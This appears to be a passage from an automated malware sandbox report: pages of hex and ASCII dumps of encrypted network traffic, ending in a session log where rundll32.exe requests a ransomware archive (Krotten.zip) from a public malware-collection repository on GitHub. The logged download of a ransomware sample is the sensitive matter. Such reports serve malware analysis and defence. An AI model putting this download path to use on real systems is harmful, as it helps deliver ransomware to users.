                                                                                                                                                    Data Ascii: +aT3eC;3MTT.1s~PI ]Sk^@( }xtD`EI3<es'N:CF(#9:.i{)F\9X3&OE,Z8H+SUZZQ:#upb'*+ubPOS|P)Dwp^.B&&`f<
                                                                                                                                                    2022-09-29 12:58:54 UTC1314INData Raw: 30 43 ab 6d ae 09 49 eb 61 71 a1 a4 db 5c af 23 ac d2 7b 6e 50 17 e0 14 8c 35 84 d3 d3 14 cb 0e e3 96 e2 36 fa cf fe 0f 9b e2 e9 30 2f 36 5b 8f f4 26 71 41 b5 00 4f 1c 0d 49 2d a9 b6 10 b0 33 45 22 49 7a 12 27 c1 b2 a9 c8 4c 6c a3 8f 55 49 65 f4 db a4 bb e4 06 d1 5c 20 76 ac 8d 47 d4 61 26 c8 49 98 2f 90 e1 e2 1d 93 30 6f 88 3d 1e 29 73 81 c1 e4 51 1f 73 fa 24 c6 9d e8 be 1b 3a df 04 ce 8d b4 95 d7 5d e4 75 6d 48 b3 23 ad 8f 2a 5e f9 93 d3 4e dd 03 5c 4f 12 fd 3f 44 bf 79 0d 27 50 a0 31 a0 ee bd 5f e0 e8 4b 5d 12 1a a1 f1 88 73 92 89 a3 20 96 5b 9c cb c2 9c 9b ca 04 6a a5 d4 fd a1 58 42 92 95 b1 dd ca d2 bf 54 ad ec 95 8c 89 28 0f 97 78 87 1d c4 c2 d0 48 12 21 7a 38 94 b3 88 7a ec 75 a9 d2 84 be f7 45 74 e3 4b 85 f1 a5 50 4c 9e c5 4c 0b 10 34 2a df 04 76
                                                                                                                                                    Data Ascii: 0CmIaq\#{nP560/6[&qAOI-3E"Iz'LlUIe\ vGa&I/0o=)sQs$:]umH#*^N\O?Dy'P1_K]s [jXBT(xH!z8zuEtKPLL4*v
                                                                                                                                                    2022-09-29 12:58:54 UTC1315INData Raw: 83 73 b0 d0 97 e9 d5 91 20 a8 75 5f 89 ca c0 3c cb cf ab 92 02 48 cc 93 79 f7 7f ef 9d 0d 51 27 36 c9 1e f2 fb 33 34 45 da 34 ee df 72 6f 9d 6c 81 f8 0b 6a 90 64 b0 11 9d 8d a8 e4 5e f2 06 b8 e0 99 d8 ae 1c 53 3b 02 f4 9f 25 08 e5 2e fa 21 f7 55 ca 85 2d db 15 7e f6 63 79 45 25 73 55 34 60 f0 7d b7 be cc 99 24 b2 44 43 4e 7e d8 5a ea f2 07 f0 3f 89 fd e5 41 79 3c 2f 45 96 11 d5 a8 30 2f 48 16 65 e7 f5 0c 2f 27 a2 22 c3 bf 40 1e 20 82 ae d4 d7 26 c5 8e 0f 3e e8 08 d6 96 5a 53 ec 6a 12 25 ba 09 a0 f6 59 40 d6 23 85 b8 67 54 c8 2b 72 32 bc 3f d1 45 16 f8 58 bd 17 45 f7 db df c2 44 3d 9c bd 6d 39 d0 87 29 e5 42 f4 46 09 91 94 91 e2 49 92 1b 80 a2 69 b0 ca 5d d2 3c c6 e3 e0 9e bf 99 e7 4b 70 87 3f 1b a5 bd 8b 2d 51 e6 3c c1 95 e5 0e 7e 71 d7 20 64 4d c6 f9 e8
                                                                                                                                                    Data Ascii: s u_<HyQ'634E4roljd^S;%.!U-~cyE%sU4`}$DCN~Z?Ay</E0/He/'"@ &>ZSj%Y@#gT+r2?EXED=m9)BFIi]<Kp?-Q<~q dM
                                                                                                                                                    2022-09-29 12:58:54 UTC1317INData Raw: db 99 4f 7c b3 82 0a 49 3b b5 da ea 1c a7 f8 15 b3 46 4d 0d 18 0f 55 02 6e d7 57 f2 b8 ff 2e 63 8d 8d ee 59 32 6c fb a4 85 2a 97 e3 54 d7 1f f9 42 0b a3 26 a5 1d 2f b5 b1 90 2e c5 64 61 41 21 04 06 dd c3 6a 07 2e 44 4c 33 89 06 db 94 ba 19 d2 af 6b f5 5a c6 b3 4c 7b e1 46 66 92 45 8a fb cc e6 32 5e f3 88 3b 93 cf 42 a0 bd b2 2d 38 4b 16 3f 05 ff 17 89 25 57 d1 0f 85 92 c8 cf 67 02 ce 83 ab 62 17 7e 00 24 15 4e 7a 45 6b 50 d1 e6 72 01 f0 68 00 14 fb 10 8b 26 d8 d5 5d 2f 7b 2c aa 54 c3 a7 6e cf 57 82 46 9e 44 c8 a6 52 31 0d f6 51 e4 25 1b fc 26 4c ed 91 fe 93 c3 ab d8 fd 87 48 ee a6 e6 fa c1 40 bd c6 a3 5f b9 c3 44 84 99 31 79 3a 50 fe ef 2c 8a 39 e3 be 00 63 02 08 41 07 b0 0f 3f 6b 00 12 07 55 4b 18 c1 46 ad 37 9a aa 72 b9 0f cc a2 6d 7f f7 ae 5b cd 1f 7a
                                                                                                                                                    Data Ascii: O|I;FMUnW.cY2l*TB&/.daA!j.DL3kZL{FfE2^;B-8K?%Wgb~$NzEkPrh&]/{,TnWFDR1Q%&LH@_D1y:P,9cA?kUKF7rm[z
                                                                                                                                                    2022-09-29 12:58:54 UTC1318INData Raw: 2a 3d 20 1c b5 5d cf 26 11 d1 0d 35 1b 93 f3 6e c9 7c 21 ef 65 8b 5e b4 8e e3 af 0c 71 1e f9 75 e7 57 43 f5 c6 6c 79 16 e1 0c b8 7f 3c 93 34 a1 55 be 19 26 2c 21 d9 27 62 7e 87 18 c2 a2 c9 cb 02 9a ab 99 9c b8 ed 23 ef d4 93 0a fd 7f 85 37 4c 4c 3b 8a 1e 48 5b d6 3b 07 a9 fa 21 b6 ff 59 d1 f9 86 2f e3 e7 d5 3b 03 ed 5b ea 21 59 8d f8 c7 ed e3 f5 7e a8 4a 22 b1 e9 5a 52 fb b0 15 f2 49 92 ee 3e 3a 39 59 33 54 80 d1 74 4d 86 e0 d3 13 5e a9 bd 68 93 5f 8f 91 65 5e 69 bd 4e eb 14 b8 37 0d ca 26 02 cf 88 31 cb 07 a8 54 69 b2 5b 4f 9a a0 fd f5 75 a2 fa cb e8 1b b6 11 8c 15 ca 02 7d 9c 3d 6f 99 7d d5 41 61 d7 a6 76 09 08 da 83 05 64 34 a9 b2 4f d7 e4 8f e7 df 99 2e b6 61 cb 63 a3 0f d3 88 d5 44 ef 29 15 49 44 de c3 68 4d db db 5f bd 70 a1 63 d7 f8 b7 57 f8 86 f7
                                                                                                                                                    Data Ascii: *= ]&5n|!e^quWCly<4U&,!'b~#7LL;H[;!Y/;[!Y~J"ZRI>:9Y3TtM^h_e^iN7&1Ti[Ou}=o}Aavd4O.acD)IDhM_pcW
                                                                                                                                                    2022-09-29 12:58:54 UTC1319INData Raw: db a5 a1 d2 dc ed 13 11 30 ca 6e f3 e0 6e 3a 16 87 a6 7b 8d d4 bc 3d f7 e6 d5 0f fa e8 0f dd 1e 82 da 76 42 98 c5 99 ed 46 87 3d ec c2 7a a0 d7 ed f8 35 a7 3c de 27 f6 54 fa 5f 55 c1 28 62 c0 c0 e8 a6 f4 05 5d 4f e1 0e ba 5b af 05 fe f2 ef c2 be 8f 42 76 9f 9b fd b2 32 cc 0f 7e 83 3a 60 c8 7b f6 b2 00 70 05 1b c4 cc b2 4b e9 13 64 c2 62 0d da f1 1b 85 ad 5f bc 77 94 ca bf 51 da e7 0e 69 ae 4c 73 e1 65 98 be 6a 11 b2 ab 1e e7 d8 29 8b 43 8f 94 e8 08 63 91 a2 96 37 62 b9 ab e1 e7 82 59 2d ed d6 90 f3 a9 39 36 ae e7 53 08 f2 23 1b 12 f1 a8 b3 1c 2d 5f 2e ab 05 9e fc ce 70 10 8f c0 c2 95 aa c8 76 0f d2 08 31 29 93 ee 4e fb 4f a2 12 e8 3d b3 82 ed 71 55 93 3f 0e 26 18 d1 69 5d 7a 30 ee a0 8f 07 9d 9e d3 9e 44 3f c2 49 88 87 58 f8 4e 7a fc 3c 02 25 4e 4c 40 63
                                                                                                                                                    Data Ascii: 0nn:{=vBF=z5<'T_U(b]O[Bv2~:`{pKdb_wQiLsej)Cc7bY-96S#-_.pv1)NO=qU?&i]z0D?IXNz<%NL@c
                                                                                                                                                    2022-09-29 12:58:54 UTC1321INData Raw: c2 fd 4b ab b8 f6 1e b3 d2 d6 2a 5c 2e 3e 2c 8a 31 59 2a 4d 1a 11 3b cf 84 48 02 6c 98 09 92 ed e6 1c 1b b5 52 98 89 4b 9e 59 e3 7f ac d7 44 18 70 7c db 52 c8 85 f7 d4 85 21 e7 55 ed 88 17 5c 7d 29 20 86 fc 64 da 87 d9 0c 92 93 2c ee 5f 60 8a 8c f6 72 bf de 22 26 fc f2 e7 4c e3 cb 46 15 3d ae f0 e7 78 3d 5e c0 2e d8 9c 40 54 c7 47 b9 c3 a2 f8 79 d1 98 98 ad b7 e4 b0 b8 28 b2 fe d3 97 f5 db c3 bd 64 b0 f2 d6 95 13 4a 4f 7c 17 ea 8c 3f 55 ff af 14 f0 46 b4 80 de 6e bb d4 3c 08 f5 4a 15 b8 ca 56 17 f5 c7 6a e0 0c 76 5d 1d 4a b4 0c 71 0f 10 2d db 8b d3 bf 36 b4 ef ac 29 cf 3f 45 69 89 30 e5 18 72 d5 8b e5 83 be fc 73 3b e3 15 45 e7 7b 18 8a 65 31 ed b6 53 5a cd c5 3b cd 41 73 99 2d 3d 7f 12 45 2f df 4c 24 d8 4f c8 30 d2 d1 67 27 2a 73 71 33 44 55 99 e2 ae be
                                                                                                                                                    Data Ascii: K*\.>,1Y*M;HlRKYDp|R!U\}) d,_`r"&LF=x=^.@TGy(dJO|?UFn<JVjv]Jq-6)?Ei0rs;E{e1SZ;As-=E/L$O0g'*sq3DU
                                                                                                                                                    2022-09-29 12:58:54 UTC1322INData Raw: 24 92 fe fc 77 e2 29 9c a9 12 46 cd 25 85 c0 aa 9f be dc b3 0c 6d 8e 0d 41 6a 3d 0d 28 a2 fa e4 db 06 3f 63 2b fb ce 1b e5 5d 42 cf 4b 1f f4 85 8a a5 d5 2b 04 fe 2a 55 fc 0e f9 dd 5e 8c e5 e1 d2 fc 7b c5 6a 0b bd 88 04 5c 08 1d ef f4 b5 33 8e 07 4a e9 80 01 0b 42 74 19 2b f3 b0 43 07 a4 d0 a4 99 d6 f8 b9 45 26 6a 6c bd f9 00 89 47 52 53 cc 8e 56 79 5c f0 cf 82 41 c0 6d 17 a0 ff 67 2c 2a 4a 37 b6 e2 31 17 af ae c9 e0 60 4d e5 7f 7b 83 49 66 5c 07 3c 68 f2 c6 83 0f 78 99 0e 39 b7 ef a0 08 6a 10 db 96 43 e6 f5 26 2d b1 f9 9f b0 94 ef 3b d2 05 dc 6b e5 e4 12 82 eb a3 80 2b 50 db 9b 9e 24 32 9f 21 b8 0f b8 cb 2b 2b 9c 2c f0 0c f7 47 c7 39 a9 cb b9 e6 a0 2c 34 03 f9 fe 1e 38 ca ff 27 2f 9c 35 62 74 1c 38 50 39 7e d4 bd f7 19 a9 34 5b d1 9b 93 52 c8 cd ff 16 b2
                                                                                                                                                    Data Ascii: $w)F%mAj=(?c+]BK+*U^{j\3JBt+CE&jlGRSVy\Amg,*J71`M{If\<hx9jC&-;k+P$2!++,G9,48'/5bt8P9~4[R
                                                                                                                                                    2022-09-29 12:58:54 UTC1324INData Raw: 25 88 e4 fb 23 04 4f 1e 93 c9 60 78 0c d6 76 57 92 e6 c1 4f d2 0a 57 c2 17 8e 75 c6 4d e4 23 b3 95 3c f7 b5 07 67 78 75 de 8e b5 3f 98 85 d0 57 6f 4b 80 46 8e 1a 54 60 c8 eb 75 1e e0 8f 99 bb 52 7e 47 9d 88 e4 c5 9d 82 d7 9b 1e 5f 48 32 75 de c9 97 c1 f4 75 5a 80 97 21 67 72 b7 f7 1f 5e fa 9e a4 d7 e2 7f ff 07 cf e9 e6 e2 43 2e f4 10 45 fd f4 ab a0 88 d2 10 8a 49 c3 25 66 f0 82 b7 bd ee 8b 4f 19 f8 1f 46 e2 0b b6 db d0 16 0d 99 cf 35 44 f6 c5 8a 01 44 d1 20 6d 7e 0e 5f 0a ec 1b f0 85 a8 2b 78 36 03 77 54 ed 64 93 f1 af 88 99 c1 fd 26 fc 5f 41 e6 2e 2e 93 ba 43 5e b8 cc 53 85 26 26 79 f7 69 79 fb 24 32 fd 0e 67 8b 65 88 d7 f2 58 dc fa 80 07 84 01 a9 f0 33 e2 10 ba 3f b1 e2 02 d9 8f b5 bf bf 0e 69 3a ef 50 09 af 73 3d 27 b0 3d ff 83 60 f9 5e b0 ad 8f 91 73
                                                                                                                                                    Data Ascii: %#O`xvWOWuM#<gxu?WoKFT`uR~G_H2uuZ!gr^C.EI%fOF5DD m~_+x6wTd&_A..C^S&&yiy$2geX3?i:Ps='=`^s
                                                                                                                                                    2022-09-29 12:58:54 UTC1325INData Raw: 9a 66 0e fd 8f 95 94 b2 46 bc 84 2f df 4e d4 2e d2 7d 0a da a0 12 54 ea 5e 03 30 b8 2a 13 c0 ab 3f 39 ce c2 d7 37 cd d0 66 33 b2 b0 97 57 4b c7 9e f5 06 f9 4b 09 0f 5c d5 c3 97 ee e6 eb 4f 94 ce a0 0f 54 0e 91 8a 5b e7 51 4a 55 c8 94 db e2 83 33 3d b0 01 9d 2c be 0c 02 f1 2b 71 f6 d3 fc 2c ea 51 dc 7c 88 c2 49 c8 05 12 73 e6 11 9e b2 f9 85 6d f2 fb d1 c4 37 a9 4e ea b4 24 e8 38 42 fe d8 bf fc fc 54 95 e7 e1 fd 3a 8f 40 72 93 53 e1 e0 1b 2b 7d da 89 8b 19 a2 e0 b8 13 a1 e0 b5 5d 1d 77 73 40 14 af 8c 8a 27 04 74 00 ad 8c 97 4e 7f 34 5c 88 56 12 9a c8 f5 e8 51 72 04 3a 0e 03 eb f8 f3 8c e5 6d b5 23 93 82 69 cd 4a 88 d8 06 51 cc a9 a2 b1 3a 74 0c a7 fe 36 a6 bf cc 8e f4 ff 7f a6 db 72 7c ca bd e2 ab 73 60 ad a7 12 25 ea bf a4 d7 2d 58 5f 4a 7b a6 4c 5f c5 1d
                                                                                                                                                    Data Ascii: fF/N.}T^0*?97f3WKK\OT[QJU3=,+q,Q|Ism7N$8BT:@rS+}]ws@'tN4\VQr:m#iJQ:t6r|s`%-X_J{L_
                                                                                                                                                    2022-09-29 12:58:54 UTC1326INData Raw: 12 6c e3 a3 b4 64 5d 9a 89 31 de 52 d2 e6 70 e6 c2 a0 10 ad 9b b4 55 1c 0b 42 af 85 02 a6 2b 0e 31 6f 15 d1 2f 99 71 d4 16 40 b9 34 20 31 20 3f 1f 54 7c 61 7e 7a 6a 21 d5 ac 8f c7 37 f3 e0 04 ab e6 f6 db cc ab 70 79 cb 0e 2d e8 c2 73 10 68 ae 88 87 ec 85 eb 7b 91 82 06 56 aa 36 2d d2 72 6e 87 08 c8 a8 bb d1 46 56 89 97 a2 7d ad 0d 24 11 2d 0c 05 ca 17 6d c0 a3 06 64 52 7c 93 52 ff d4 40 77 4f 00 40 ee da b6 d1 48 70 f2 c1 86 4a df e6 d2 0c 51 22 f1 b1 ca ce a8 a5 9a 1c a2 04 c9 0c ea 98 9a e1 01 de ca 21 3c 88 bb 4d e4 51 b2 fe 0a 11 7c e0 48 41 15 d0 f6 c3 8d b8 24 27 86 8d 40 aa d1 28 54 19 e7 26 da 7f a3 65 57 00 1f 3b c6 67 c6 d3 20 9a 7a 93 32 e7 1a 69 a9 5a df 40 72 63 d5 ad 4d 5d 94 f4 53 e4 32 3c b6 97 56 8d 7c da 76 32 dc 47 76 ab ef f7 17 f9 4e
                                                                                                                                                    Data Ascii: ld]1RpUB+1o/q@4 1 ?T|a~zj!7py-sh{V6-rnFV}$-mdR|R@wO@HpJQ"!<MQ|HA$'@(T&eW;g z2iZ@rcM]S2<V|v2GvN
                                                                                                                                                    2022-09-29 12:58:54 UTC1328INData Raw: 67 07 2e e4 72 1c 2e f7 44 d7 94 19 62 36 3b c3 7e 23 ce 89 35 8a 82 10 11 c8 92 e0 27 8b d4 b4 7b 95 15 84 3b 65 d1 63 fd 82 c2 77 b1 c7 0f 22 7a 8a 0f 65 e6 4a 94 2c 29 4b 73 9f de 17 0b 55 c4 02 bb 6d 4a 00 be ec e6 b3 7c c1 68 f2 03 56 c9 bb 2f 40 df 26 c3 8b 2c ca 4f 7d 8c 06 4e bc dd 7a 3a c0 b5 81 ff 43 76 7a 41 f0 32 ff 83 e0 af 9c ab ae 4d 47 0e 12 a7 b1 31 e2 f2 2c 99 95 15 af 81 3d 23 bd 1e 38 7a 40 44 70 10 80 ad 7a 4d 34 79 29 12 75 0c f0 4a ed 00 32 8a fc 84 fb 30 43 7d da e5 0d 19 d1 26 75 9a 32 7d 62 b3 f4 a0 ed f6 34 fc 82 27 7e 30 3a 3f 3b 0d 20 99 2e 85 b8 a4 4b 6d 18 64 3b 11 fc 22 1e 17 ab 7b 8b f2 62 af ba 20 f4 53 d6 a3 c5 1a e4 47 da d4 0c 23 f3 a7 60 d6 ae 06 26 dd 5f 06 bd e4 93 47 ad 73 fe 1e 94 0c 56 9c 30 4a 93 02 b0 c0 e3 22
                                                                                                                                                    Data Ascii: g.r.Db6;~#5'{;ecw"zeJ,)KsUmJ|hV/@&,O}Nz:CvzA2MG1,=#8z@DpzM4y)uJ20C}&u2}b4'~0:?; .Kmd;"{b SG#`&_GsV0J"
                                                                                                                                                    2022-09-29 12:58:54 UTC1329INData Raw: 35 f5 8e 24 0c 44 c7 62 96 b4 1c 9e de 54 4a 32 fd 6f 5d 5d 16 35 27 5a 12 2e 5d a8 6b ad af d0 d1 b9 cc c9 12 09 2e ee b2 94 3d 0c 7d 89 38 a8 56 ca 35 8f 05 de 09 44 66 a2 fc 9f 34 be f5 de 18 fd 8c db 46 06 2a ef 5d 76 6a f8 22 8c 08 0e 68 17 5f 67 11 da 5c 13 16 71 89 b1 a2 ac ef bc 4a 61 9f 74 c7 5f 40 12 8f 5c 8c 76 c4 8f f2 c8 ee fe b1 00 f1 f1 2a 1d c5 31 2f 5e 63 ab 43 73 c0 b7 5c e2 3d 03 9e dc 80 f9 7b ad ec e1 e7 84 9d 65 ff e4 85 2c 59 8d 2b 15 50 46 11 74 27 f0 7a b5 51 73 51 d0 7f 86 7f 3c 7c a7 bd ea af bf 73 31 53 07 e2 4e c9 19 69 52 33 80 1c 58 5f a2 9b 8a 7e 6f 5e dc 68 e6 5a 46 c8 d8 0a 8d 5b c4 95 53 ba 44 af 23 ec 4a 8b 82 d8 a2 29 cc aa 84 94 bd b9 97 29 0d f0 96 25 47 35 da 24 4c f4 9e 1a 24 14 9f 6e f7 35 15 0a d2 09 00 21 39 aa
                                                                                                                                                    Data Ascii: 5$DbTJ2o]]5'Z.]k.=}8V5Df4F*]vj"h_g\qJat_@\v*1/^cCs\={e,Y+PFt'zQsQ<|s1SNiR3X_~o^hZF[SD#J))%G5$L$n5!9
                                                                                                                                                    2022-09-29 12:58:54 UTC1330INData Raw: fc d0 c7 e3 c0 a9 87 b5 19 b7 18 b8 19 75 4f b9 f3 31 01 54 03 66 c6 d3 c9 aa 58 14 fb 32 67 4c 72 34 dc 6a 52 31 73 30 6a a9 b3 5a 23 90 b7 7e 34 9d 1e dd a2 67 57 d5 46 4a 16 64 e0 58 76 e9 29 8b 09 f3 b1 a6 66 5d 0c b8 30 1c 92 6e 12 b4 62 7b 5e 48 30 fc e5 00 ee 57 a3 f5 9e 2f 85 0b 3e f8 d9 02 4e ce 8b 5a e4 12 48 13 12 9a c1 c1 cd 97 25 3f 1b 05 d1 00 79 5a ee c7 e1 93 a4 13 bf 00 2a 63 aa aa 6c 96 e0 e1 c0 4c df f8 70 94 de 0b ab 24 05 2a 28 5b 7d 8a 5b 88 1d 07 69 0f f6 83 bc bf 4b 64 f9 dd 41 fa d7 30 27 d1 b6 a4 ea aa 97 ff 15 29 81 e4 05 18 d0 d0 13 a5 c6 80 5e 27 ca dd f3 c9 17 ed f1 83 9d 2b 50 b5 33 6c 67 07 2a 5f 34 8f fa 97 43 fc ad 14 3c 3e f7 26 40 bb 02 24 bf e9 37 87 63 b6 2c da 76 d0 a8 2a 8b 69 00 b2 96 c2 51 1a 63 35 78 2b 76 d8 97
                                                                                                                                                    Data Ascii: uO1TfX2gLr4jR1s0jZ#~4gWFJdXv)f]0nb{^H0W/>NZH%?yZ*clLp$*([}[iKdA0')^'+P3lg*_4C<>&@$7c,v*iQc5x+v
                                                                                                                                                    2022-09-29 12:58:54 UTC1332INData Raw: d1 05 3a 8c 59 a6 b0 c3 09 8a 36 7e 25 46 14 07 53 76 e2 44 ef 79 47 7c 0b da 8f bb 07 67 47 f2 e7 66 32 a3 c4 e8 10 1a 7a da e6 80 9c dd 44 f4 35 63 d7 64 a0 43 69 c9 e0 91 21 b5 96 ab 95 e0 da d8 a8 a5 a3 75 fa 72 5b 97 6c 1c 23 48 d2 a9 25 5a e2 84 e3 5c 13 81 f2 4e 19 d7 91 c0 58 ba a6 31 ba 4f b7 1e 72 ab b0 ff d7 91 be 24 dc 27 a5 e1 00 4d bd 59 97 8f f6 85 c0 0b 02 61 79 0e 23 a3 73 10 fd 22 92 a8 f6 f5 3d d1 7c e7 8c a5 a4 f4 b7 76 18 ec 64 84 e4 85 61 01 3f 7c e6 4b c5 5b e7 dc 96 1a 76 db 32 0d 7a 1b de 0d 2d a9 c9 ba d0 1a 5a 35 db 4e f0 06 56 3a ca d4 a5 58 0e 66 71 4c de 86 d8 2a 1c d5 a4 99 6c 0c 03 03 f6 b8 44 11 02 46 c5 95 6f fd 64 f7 b4 32 3c 4e f5 b5 a3 d2 4b 7e 6a a6 93 ab 2d d6 8e 4f 14 81 d5 29 2c da 79 ac 30 7a 4e 19 6d c4 9d 9c de
                                                                                                                                                    Data Ascii: :Y6~%FSvDyG|gGf2zD5cdCi!ur[l#H%Z\NX1Or$'MYay#s"=|vda?|K[v2z-Z5NV:XfqL*lDFod2<NK~j-O),y0zNm
                                                                                                                                                    2022-09-29 12:58:54 UTC1333INData Raw: 9d e9 26 66 0b c0 be a2 8a f2 b5 49 97 8b 71 fe 8c 57 af 97 c6 37 17 62 a2 47 11 ba c7 55 ef ba 63 b6 74 06 4f 4d 35 99 81 02 8a 76 18 a0 32 4a 64 53 d3 bf 05 55 ca 03 ac fc 77 e4 4f 90 d3 e0 c5 c1 75 e5 33 6f 92 85 38 36 00 fd ea 92 e9 d9 da 56 e0 6d 2e ec c6 ed 92 62 f1 45 40 ef 69 14 2c 83 49 05 bc f0 45 5c 70 2d 2a e2 38 82 3e 86 c3 d7 62 25 f6 46 f5 6e 71 4c 47 25 ec 0b 80 d5 96 c2 7d 0f 2d c7 00 55 c1 d7 56 de cd 35 4b b5 9b 06 87 4b 03 85 d2 13 f5 46 8f da 9e 76 88 a4 29 40 97 b0 15 99 b5 22 d4 a1 af ee 8b d5 78 96 e1 10 a8 18 1e e4 8f 2c d5 85 13 57 f1 e6 d2 a8 29 63 56 03 ea 12 23 4e e1 18 15 77 ba 2c 36 5f 67 d5 6f 58 7d 86 23 b4 22 32 0e 05 ee 2e c5 37 ef 5c c0 12 d5 9b d0 a9 d1 64 61 69 ad 91 37 73 fa 16 37 b1 60 4b 84 e5 ef 64 25 a6 ab 8b fb
                                                                                                                                                    Data Ascii: &fIqW7bGUctOM5v2JdSUwOu3o86Vm.bE@i,IE\p-*8>b%FnqLG%}-UV5KKFv)@"x,W)cV#Nw,6_goX}#"2.7\dai7s7`Kd%
                                                                                                                                                    2022-09-29 12:58:54 UTC1334INData Raw: b7 59 6a c0 79 dc 53 40 76 b2 72 ae bc 89 15 cd 23 2c 1e 0d 7f aa 04 e6 fb 87 d0 50 72 0c 4b 41 ab c0 ba 75 54 dd d8 77 0a 60 7c b3 8b 45 a5 14 03 9e 92 e5 a4 97 a2 cc 83 d0 f8 e8 49 25 64 1b 0e 54 e0 48 9b 4e 02 f1 51 37 be 63 03 a3 96 e3 59 5d 35 a9 7e d8 96 e2 d2 22 d3 49 02 62 20 2c af 4f 2f dc 12 ba ec ae 0a d4 a4 5a 39 62 bc 0a 0b 0c 78 f4 3d 3a 96 d1 cd 1d da fe 87 6f f3 d5 cc 5f fd a8 c5 cf ea e6 02 c6 4b 92 83 b7 d3 28 27 6f cf 20 b8 8b 16 55 88 a8 ed da e0 c7 49 ef 13 df 90 0a eb 22 2a 57 a0 05 21 02 85 00 5a c6 ee 23 51 88 b0 41 b1 0d e8 7a 5d e7 98 20 eb 8a e5 2a 09 55 c0 7c 28 f6 59 d8 fc 3d fe d1 8a 52 99 5d 19 ae 08 ba df ee c4 8a 9d 8f e0 6d 75 ed 0b 3c 63 a3 f3 de ae 2a 81 1d 39 f7 5b 50 44 73 f6 d9 08 61 80 03 af 89 a6 01 cc f2 ae 55 f6
                                                                                                                                                    Data Ascii: YjyS@vr#,PrKAuTw`|EI%dTHNQ7cY]5~"Ib ,O/Z9bx=:o_K('o UI"*W!Z#QAz] *U|(Y=R]mu<c*9[PDsaU
                                                                                                                                                    2022-09-29 12:58:54 UTC1336INData Raw: 59 68 ed 48 0b 4b 60 bb d2 44 31 04 9a 18 60 1e 68 b7 97 2a 8c 3f 6c b4 11 c6 3c 2c 4c 70 f1 40 ee 0b a5 b0 03 07 e5 09 49 a9 3d 28 3c 73 d4 67 17 cd b3 97 4b 8d c5 c0 be e1 a6 79 12 12 df 9e 8f 9e b5 fa e4 68 68 41 20 e3 c4 f5 a8 4d ec 28 93 3c 10 78 48 be 06 01 00 3c 14 af eb 98 8e 24 79 a5 7d 04 4e 2f f5 4e ff a4 b7 6b 64 78 86 9e 66 8e b6 86 58 fd 3c 50 61 70 9a e0 02 78 96 63 98 5d fc c4 23 53 fd 80 4b 2d 7a a0 73 4a 75 e1 b1 4b f3 cd b0 f7 11 8d 33 0d b6 6a 30 d7 26 fd 5c fb a7 e2 cc 34 ea 91 de c8 3f a0 76 ec d7 32 83 0a 95 2d 53 01 e4 8d c9 2c 43 8f 0f 00 0a 80 90 fc 32 4f f6 77 53 dd 44 96 3a 6f f5 01 66 12 1c 3b a7 eb b7 3c e5 3e eb 4b 8f 91 4a ca dc 35 0e 21 af e2 df 2e 39 3e f6 f0 3f ec 43 c0 7d e9 06 bb 66 fe 5e 8f 9c c1 a9 41 d6 31 ff cb 2a
                                                                                                                                                    Data Ascii: YhHK`D1`h*?l<,Lp@I=(<sgKyhhA M(<xH<$y}N/NkdxfX<Papxc]#SK-zsJuK3j0&\4?v2-S,C2OwSD:of;<>KJ5!.9>?C}f^A1*
                                                                                                                                                    2022-09-29 12:58:54 UTC1337INData Raw: 60 6a d3 38 e0 a9 a6 98 c6 d4 8f c5 71 2d 02 b2 f1 d3 8f 27 61 5d 43 6e a0 79 00 f8 09 58 78 93 a2 c1 8d 3c 38 fd 65 92 00 4d 1b c2 59 b0 a2 7a c2 5e 5d a7 99 17 ea 2c d9 c4 d2 fd ed 33 5a 14 a2 4e 45 2b 7c 97 c7 fc e7 6c c9 c8 59 b5 8f dd f2 c5 30 f8 35 1f 6e f5 08 c1 7a fd c4 29 3f b9 3a 43 fa ef c0 d7 39 0c 5f fa 22 61 cb 49 f1 06 a9 fc 40 47 46 13 62 5a 55 79 43 e2 80 db 9a c6 d0 cc 66 5c 23 bb 21 b4 44 9f 11 43 80 8a 90 9d c5 55 0b a8 d2 eb 35 20 e8 72 dc ac 16 5e 6b f4 53 0a 89 49 7c 18 86 58 73 52 06 5d e5 2f bd 0f 90 29 9c b5 19 cf 1b 1e 03 ec 8d 13 ea cb c2 4d 87 dd 18 22 06 52 de 7e a9 24 96 71 67 54 ee a6 35 05 bc 8a 01 cd 35 a0 a1 c9 fb e1 e6 c1 61 ea cb ac 99 a5 1a 61 0b 2f 93 ec 0e 2e b1 f6 5a 25 7f 16 ec ce 65 20 97 37 c0 fc 98 16 40 16 5e
                                                                                                                                                    Data Ascii: `j8q-'a]CnyXx<8eMYz^],3ZNE+|lY05nz)?:C9_"aI@GFbZUyCf\#!DCU5 r^kSI|XsR]/)M"R~$qgT55aa/.Z%e 7@^
                                                                                                                                                    2022-09-29 12:58:54 UTC1338INData Raw: e7 90 e3 3c ac 3b 94 69 03 8f 11 d4 e1 bc 85 c2 be dd 36 41 cc 1b ba 0c 59 86 0f 33 96 9b 38 6b 74 68 42 5c e3 55 81 20 bc c9 e9 35 be 3f 1e 8c b6 82 d1 c4 42 48 d7 45 d2 65 e9 a3 35 15 20 94 67 87 1d 7e 12 74 d4 4d 32 b3 eb 69 a1 46 71 59 22 33 b2 54 0e 18 d9 2c f1 e8 95 a4 8c 64 ba 66 db 2c 07 ad f4 70 6c 09 c5 d4 b9 63 a0 d5 35 fb 81 93 da cc d1 e3 ad 7c d5 8d 35 44 66 78 d0 fa de 95 98 c7 c9 91 2a c1 f1 fb 35 63 65 3b 4d a7 30 ec 40 c5 ad e1 23 8a 79 66 2f 52 b1 28 b7 76 73 f2 ab 3b 4a e0 f4 60 60 fb ad 50 28 6c b1 51 ee cd 69 5b f7 29 ae 4f 35 01 70 4d 35 8f 2d a1 df 57 cc f6 5d b9 3c 40 e1 f5 4a 47 1b 95 4f 60 43 1c 70 a0 7e e1 ab 04 3a a2 01 93 41 ec f2 e6 6b 02 82 22 97 91 8d a4 df 67 48 ee 77 00 e2 c2 ec aa 9c 8b d1 28 07 6a 70 c9 75 18 d0 d6 72
                                                                                                                                                    Data Ascii: <;i6AY38kthB\U 5?BHEe5 g~tM2iFqY"3T,df,plc5|5Dfx*5ce;M0@#yf/R(vs;J``P(lQi[)O5pM5-W]<@JGO`Cp~:Ak"gHw(jpur


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                    29192.168.2.349722140.82.121.3443C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                    2022-09-29 12:58:54 UTC1340OUTGET /Endermanch/MalwareDatabase/raw/master/ransomwares/Krotten.zip HTTP/1.1
                                                                                                                                                    Host: github.com


